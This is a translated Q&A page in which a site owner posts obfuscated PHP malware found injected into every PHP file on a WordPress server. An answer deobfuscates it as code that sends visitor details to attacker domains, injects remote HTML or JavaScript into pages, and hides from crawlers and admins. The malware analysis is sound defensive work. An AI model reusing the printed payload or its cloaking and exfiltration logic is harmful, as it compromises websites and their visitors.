web-dev-qa-db-fra.com

Est-ce une porte dérobée?

J'ai trouvé le code ci-dessous sur mon site client. Cela ressemble à une porte dérobée typique cachée avec hexadécimal, mais je ne suis pas sûr à 100%.

<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $zdsnpbzghe = 'x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878:<##:>5c%x7860QUUI&e_SEEB%x5-%x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%xX;%x5c%x7860msvd}R;*msv%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)tutC%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x7825of.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x55c%x7825tww**WYsboepn)%x5c%x78258:}334}472%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]258]y6g]273]y76]2715hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x786]267]y74]275]y7:]268]y7f#<!%x5c%x7825tww!>!)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5464]284]364]6]234]342]58]24]31#-%x5782f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x5c%x785c}X%fmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c#)fepmqyf%x5c%x7827*&7-n%x5c%x7860hfsq)!sp!*#ojneb#-278]225]241]334]368]322]3]364]6]2{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%160%x28%42%x66%152%x66%147%x67%42%x2c%163%y35]256]y76]72]y3d]51]y35]274]y4:]82ovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5c%x7c%x7825iN}#-!tussfw)%x!isset($GLOBALS["%x61%156%x75%156%x61"])))) %x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvsox7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+99386c!<2p%x5c%x7825%x5c%x787f!~!<##!>!2p%%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bub6<.3%x5c%x7860hA%x5c%x7827pd%x5c%x78256%x7825:|:*r%x5c%x7825:-t%x5c%x782%x782f#%x5c%x7825#%x5c%xx7827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;7824-%x5c%x7824]y8%x5cx7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%jyf%x5c%x7860439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:OBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojRx5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%x7824-tus85csboe))1%x5c%x782f3g%x5c%x7825)!gj!~<ofmyx5c%x7827pd%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]c%x786057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%xx7825b:<!%x5c%x7825c:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:^<!%x5c%787f_*#fubfsdXk5%x5c%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]273]y76]258x7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c3:]68]y76#<%x5c%x78e%x5c%x78b,;uqpuft%x5c%x7860msvd}+;!>!}%x5c%%x5c%x7860TW~%x5c%x7824<%xx7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x7317]445]212]445]43]321]87f<*X&Z&S{ftmfV%x5c%x78%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825)+opjudc%x7825:<**#57]38y]47]67y]37]88y]27]28yx7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x59]274]y85]273]y6g]273]y76]%x5c%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*!osvufs}w;*%x5c%x787f!>>%x5c%x7822!pd%x5x5c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w#)ldbqov>*o%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#uj4]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3P6L1M5]Dx7825zB%x5c%x7825z>!HB%x5c%x7860SFTV%x5c%x7860QUUIy76]61]y33]68]y34]68]ypd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%x78786<x7860opjudovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGT%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7gA%x5c%x7827doj%x5c%x78256<%xc%x782f#)rrd%x5c%x782f#00;quui#>.%x5c%x7825!<***fufs:~:<*9-1-r%x5c%x7825)s%x5c!>!#]y84]275]y83]273]y76]277fnbozcYufhA%x5c%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5fmjg}[;ldpt%x5c%x7825}K;%x5c%x7860ufldpt}c%x7825!<*#}_;#)323ldfid>}&;!osvufs}825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%xgj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<.fmjc%x7827rfs%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-278256<.msv%x5c%x7860dz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z5297e:56-%x5c%x7878r.985:52985-t.98]K4]65]D8]86]y31]285]82]y76]62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", NULL); };)gj}l;33bq}k;opjudovg}%xif((function_exists("%x6f%142%x5f%163%x74%141%x72%164") && (x74%162%x5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%16x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{56<pd%x5c%x7825w6Z6<.4*f%x5c%x7825)sf%x5c%x7878pmpusut)tpqssutRe%x5c%25mm)%x5c%x7825%x5c%ubq#%x5c%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<%x7824-%x5c%x7824]26%x5c%x5c%x7825Z<#opo#>b%x5c%x7825!*##>>X)!2272qj%x5c%x7825)7gj6<**2qj%x5c%x7825x5c%x7825Z<^2%x5c%x785c7%x65","%x65%166%x61%154%]#%x5c%x782fr%x5c%x7825%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x786027,*b%x5c%x7827)fepd787f%x5c%x787f%x5c%x787f<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x7x7860%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x78257>%x5c7825%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5cftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]37]%x5c%x7825,3,j%x5c%x7825>j%x7824]25%x5c%x7824-%x5#65,47R25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>U<#16,47R57,2824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#mhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%tussfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x7825{ $GLOBALS["%x61%156%x75%156%x61"]=1; function fjfgg($n){return chr(ox5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x:h%x5c%x7825:<#64y]5>}R;msv}.;%x5c%x782f#%x5c%x7W#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%7!hmg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)t&b%x5c%x7825!|!*)323zbek!~!#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuop%x7825>%x5c%x782fh%x581]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%xx28%151%x6d%160%x6c%157%x64%145%x28%141%x72%162%x61%171%x5f%155%x61]47y]252]18y]#>q%x5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%x5c256<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5c%x75c%x78e%x5c%x78b%x5c%x78!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%7R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R37,18Rc%x7825!<*::::::-111112)eobs%x5c%x7860un%x7824-%x5c%x7824<%x5c78]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f5]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x78255.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%#<%x5c%x7825t2w>#]y74]273]y76]252]y85]256]y6g]257]y8)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x5c%x7825)%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x78c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFb:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x7824!%x782f20QUUI7jsv%x5c%x78257UFH#%x5%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmqyfA>2b%x*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%x5c%x5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x7860hAx5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j:=trd($n)-1);} @error_reporting(0); preg_replace("%x2f%50%x2e%52%x29%585cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]DwN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x5c%x782]y7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%5c%x7878;0]=])0#)U!%x5c%x7827z<jg!)%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!%x5c7;utpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x7824Ypp3)%x5c%x7825cB%x5D#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgPdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c%x78c%x782f+*0f(-!#]y76]277]y72]265j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%825i%x5c%x785c2^<!Ce*[!%x5cpqsut>j%x5c%x7825!*9!%x5c%x7827!hmqj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj83]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]ojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw5%x3a%146%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y4]275]y83]248]y83]256]y81]265]y72]254]y76#<%x5c%x7825tmw5]y39]271]y83]256]y78]248]y83]256]y81]265]y72]254]822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c%x787f%x5c%xbss-%x5c%x7825r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x78256<C%E{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]28c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x7>!fyqmpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]51]5c%x785cSFWSFT%x5c%x7860%x5c%x7825}X;!sp!*#opo#>]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hnx5c%x7825)}.;%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft%x5c%x7860msvd}x5c%x7824<!%x5c%x7825tzw>!#]y76]277]y72]265]y35c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x782x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7822b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5c%x7825c!>!%x5c%x75c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)3of>25)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x78242178}527}85c%x7825!|!*!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x7826<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubfs2fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%>1*!%x5c%x7825b:>1<!fmtf!%x5c%x78255c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%x5c%x7825wc%x7824-!%x5c%x7825%25hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%xj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>%x782f7&6|7**111127-K)qpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf)%%x5c%x7824-%x5c%x7824*<!%x5c%x7824c%x7825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:osv>qp%x5c%x7825!|Z~!<##!>!2p%x%x7825z>2<!%x5c%x7825ww2)%x5c%x7825wbd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#npd%x56*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x7882f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)54l}%x5c%x7827;%x5c%x78257%x5c%x782f7#@#7%x5c%x782f7^#i33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y271]y7d]252]y74]256]y39]252]y83]273]y72]282#<!%x5c%x7825tjw!>!#]y8%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%x7825t%x5c%x7827pd%x5c%x782%x5c%x787f;!opjudovg}k~~9{d%-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x5c%x7825f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+f52]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>s%x5c%x7825<#462<b%x5c%x7825%x5c%x787f!<X>b!|ftmf!~<**9.-j%x5c%x7825/(.*)/epreg_replacepcxbdxfawf'; $ibnuwgraod = explode(chr((272-228)),'3721,60,1040,44,4913,69,6639,67,4175,25,5385,67,880,43,3781,56,7594,63,2006,29,6509,67,9756,21,3876,22,3532,51,1285,39,7868,58,1712,52,728,25,4442,69,9108,22,2767,44,228,65,6997,43,6357,34,3325,57,7457,39,8745,65,7272,52,4115,37,6100,56,3099,58,9571,37,3965,46,5581,53,6706,36,6742,41,3382,20,4551,40,1898,21,3499,33,3278,47,2964,29,8908,59,5905,39,2357,64,2864,35,1560,42,2525,52,7557,37,9442,64,4231,63,3157,41,144,24,8232,66,2035,34,1381,47,2421,40,3459,40,2811,53,10081,25,9805,67,3234,44,8344,64,5127,59,7423,34,1690,22,4651,27,2461,64,686,42,1241,44,7926,62,8163,69,2701,66,1205,36,4152,23,8472,39,6391,63,8572,47,9385,57,2993,49,6156,47,4294,20,293,52,5774,40,9321,28,8682,63,9935,55,4819,47,753,27,3898,47,1150,55,5322,63,68,22,6203,43,2649,30,5186,27,10054,27,4077,38,9872,63,540,58,1764,70,8115,48,5040,28,9506,65,3198,36,9777,28,168,60,1500,60,6454,55,2180,69,959,59,7763,53,4314,60,2156,24,4011,42,4700,58,5717,57,5213,38,7155,53,4374,68,3837,39,3696,25,6922,29,813,67,1357,24,633,53,8298,46,2331,26,9651,66,7657,56,3071,28,6048,52,496,44,9279,42,3042,29,5251,21,2249,39,4200,31,8810,63,0,68,5020,20,9990,64,5452,59,1324,33,8619,63,377,70,6876,46,4678,22,8967,20,8408,64,7354,42,1602,67,9130,66,4982,38,1428,22,4053,24,5814,22,2899,65,9196,34,90,54,4511,40,6292,65,8066,49,923,36,7095,60,1018,22,8511,61,7396,27,1084,66,5658,59,2629,20,4866,47,6832,44,447,49,8987,69,345,32,7816,52,5272,50,3583,53,5836,38,5511,70,7208,64,6783,49,2577,52,7988,39,5874,31,1969,37,9717,39,3402,57,4591,60,780,33,7496,61,2133,23,598,35,8027,39,1669,21,5991,57,1450,50,6576,63,9056,52,8873,35,6246,46,1834,64,2288,43,9230,49,5944,47,6951,46,9349,36,2069,26,5634,24,3945,20,2095,38,4758,61,5068,59,1919,50,7040,55,7324,30,7713,50,2679,22,9608,43,3636,60'); $hlrywdpqbc=substr($zdsnpbzghe,(44960-34854),(41-34)); if (!function_exists('kscpwxzuhr')) { function kscpwxzuhr($xjucvuiret, $bsoixxpekh) { $uzadkdkdcj = NULL; for($ylffdjxxwv=0;$ylffdjxxwv<(sizeof($xjucvuiret)/2);$ylffdjxxwv++) { $uzadkdkdcj .= substr($bsoixxpekh, $xjucvuiret[($ylffdjxxwv*2)],$xjucvuiret[($ylffdjxxwv*2)+1]); } return $uzadkdkdcj; };} $jztylhmlin="\x20\57\x2a\40\x74\150\x6f\157\x63\172\x77\144\x78\152\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\60\x36\55\x31\66\x39\51\x29\54\x20\143\x68\162\x28\50\x32\71\x35\55\x32\60\x33\51\x29\54\x20\153\x73\143\x70\167\x78\172\x75\150\x72\50\x24\151\x62\156\x75\167\x67\162\x61\157\x64\54\x24\172\x64\163\x6e\160\x62\172\x67\150\x65\51\x29\51\x3b\40\x2f\52\x20\156\x6f\153\x7a\142\x6d\165\x76\165\x6e\40\x2a\57\x20"; $nbbppijzpp=substr($zdsnpbzghe,(68445-58332),(68-56)); $nbbppijzpp($hlrywdpqbc, $jztylhmlin, NULL); $nbbppijzpp=$jztylhmlin; $nbbppijzpp=(752-631); $zdsnpbzghe=$nbbppijzpp-1; ?>

S'il s'agit en fait d'une porte dérobée, je suis curieux de savoir ce qu'il fait, si quelqu'un a le patient pour l'interpréter.

Merci d'avance.

MODIFIER:

Mon client n'est pas impliqué dans le développement Web et quand je lui ai posé des questions sur ce code, il ne l'avait certainement pas vu auparavant.

J'ai remarqué maintenant que le code est placé en haut de presque tous les fichiers dans une installation WordPress, car il y aurait été placé automatiquement.

MODIFIER 2:

Le code malveillant a en fait été placé dans tous les fichiers PHP sur le serveur, pas seulement dans WordPress.

phpbackdoor
26
Ivar

Non. La porte dérobée n'est pas sur ce script. Ce morceau de code hautement obscurci contient un programme permettant au pirate d’ajouter dynamiquement du code HTML ou javascript en appelant de manière aléatoire un serveur situé au 31.184.192.250 avec l’un des quatre noms d’hôtes "33db9538.com", "9507c4e8.com", "e5b57288 .com "," 54dfa1cb.com ".

Le code désobfusqué ressemble à ceci:

// generate hostname
function random($arr, $qw) {
    $arr = array("33db9538", "9507c4e8", "e5b57288", "54dfa1cb");
    return $arr[Rand(0, 1.125)].$qw;
}

// return hostname of malware-hosting server
function cqq($qw)
{
    return random($domarr, $qw);
}

// custom encoding
function en2($s, $q)
{
    $g = "";
    while (strlen($g) < strlen($s)) {
        $q = pack("H*", md5($g.$q."q1w2e3r4")); # convert to binary string
        $g.= substr($q, 0, 8);
    }
    return $s^$g; # XOR, bits set in either $s or $g but not both
}

// g_* functions are four different ways to retrieve content from remote URL
function g_1($url)
{
    if(function_exists("file_get_contents") === false) return false;
    $buf = @file_get_contents($url);
    if($buf == "") return false;
    return $buf;
}

function g_2($url)
{
    if(function_exists("curl_init") === false) return false;
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    $res = curl_exec($ch);
    curl_close($ch);
    if($res == "") return false;
    return $res;
}
....

// try progressively more complicated method if the previous one did not work
function gtd($url)
{
    $co = "";
    $co = @g_1($url);
    if($co !== false) return $co;
    $co = @g_2($url);
    if($co !== false) return $co;
    $co = @g_3($url);
    if($co !== false) return $co;
    $co = @g_4($url);
    if($co !== false) return $co;
    return "";
}

// encode server parameters
function k34($op, $text)
{
    return base64_encode(en2($text, $op));
}

// check if server parameters exist
function check212($param)
{
    if(!isset($_SERVER[$param])) $a = "non";
    else if($_SERVER[$param] == "") $a = "non";
    else $a = $_SERVER[$param];
    return $a;
}

// extract payload
function day212()
{
    $a = check212("HTTP_USER_AGENT");
    $b = check212("HTTP_REFERER");
    $c = check212("REMOTE_ADDR");
    $d = check212("HTTP_Host");
    $e = check212("PHP_SELF");
    $domarr = array("33db9538", "9507c4e8", "e5b57288", "54dfa1cb");
    if(($a == "non") or ($c == "non") or ($d == "non") or strrpos(strtolower($e), "admin")
     or (preg_match("/google|Slurp|msnbot|ia_archiver|yandex|rambler/i", strtolower($a))))
    {
        $o1 = "";
    }
    else {
        $op = mt_Rand(100000, 999999);
        $g4 = $op."?".urlencode(urlencode(k34($op, $a).".".k34($op, $b).".".k34($op, $c)
         .".".k34($op, $d).".".k34($op, $e)));
        $url = "http://".cqq(".com")."/".$g4;
        $ca1 = en2(@gtd($url) , $op);
        $a1 = @explode("!NF0", $ca1);
        if(sizeof($a1) >= 2) $o1 = $a1[1];
        else $o1 = "";
    }
    return $o1;
}

// uncompress html to buffer
function dcoo($cz, $length = null)
{
    if(false !== ($dz = @gzinflate($cz))) return $dz;
    if(false !== ($dz = @comgzi($cz))) return $dz;
    if(false !== ($dz = @gzuncompress($cz))) return $dz;
    if(function_exists("gzdecode")) {
        $dz = @gzdecode($cz);
        if(false !== $dz) return $dz;
    }
    return $cz;
}

// callback function to accept buffer and append code at bottom of html
function pa22($v)
{
    Header("Content-Encoding: none");
    $t = dcoo($v);
    if(preg_match("/\<\/body/si", $t)) {
        return preg_replace("/(\<\/body[^\>]*\>)/si", day212()."\n$1", $t, 1);
    }
    else {
        if(preg_match("/\<\/html/si", $t)) {
            return preg_replace("/(\<\/html[^\>]*\>)/si", day212()."\n$1", $t, 1);
        }
        else {
            return $t;
        }
    }
}

// start processing
ob_start("pa22");

/**** original code starts here ****/
....

Le code ci-dessus est capable d'échapper à la détection par les principaux moteurs de recherche et l'administrateur du site car il renvoie une page normale lorsque certains critères sont respectés. Je ne suis pas en mesure de savoir quel code est ajouté, peut-être parce que le serveur d'hébergement de logiciels malveillants vérifie également si la demande provient d'un serveur infecté.

Il semble qu'une vulnérabilité Wordpress a été introduite par une version non corrigée du plug-in MailPoet . Cela permet à un pirate de télécharger un script malveillant avec les informations d'identification d'un administrateur dans un Wordpress theme et exécutez ce fichier en accédant à l'URL. Vous pouvez trouver plus d'informations sur ce blog de sécurité .

La clé à retenir de cet incident est de sauvegarder fréquemment vos données et de mettre à jour votre logiciel en toute conscience.

47
Question Overflow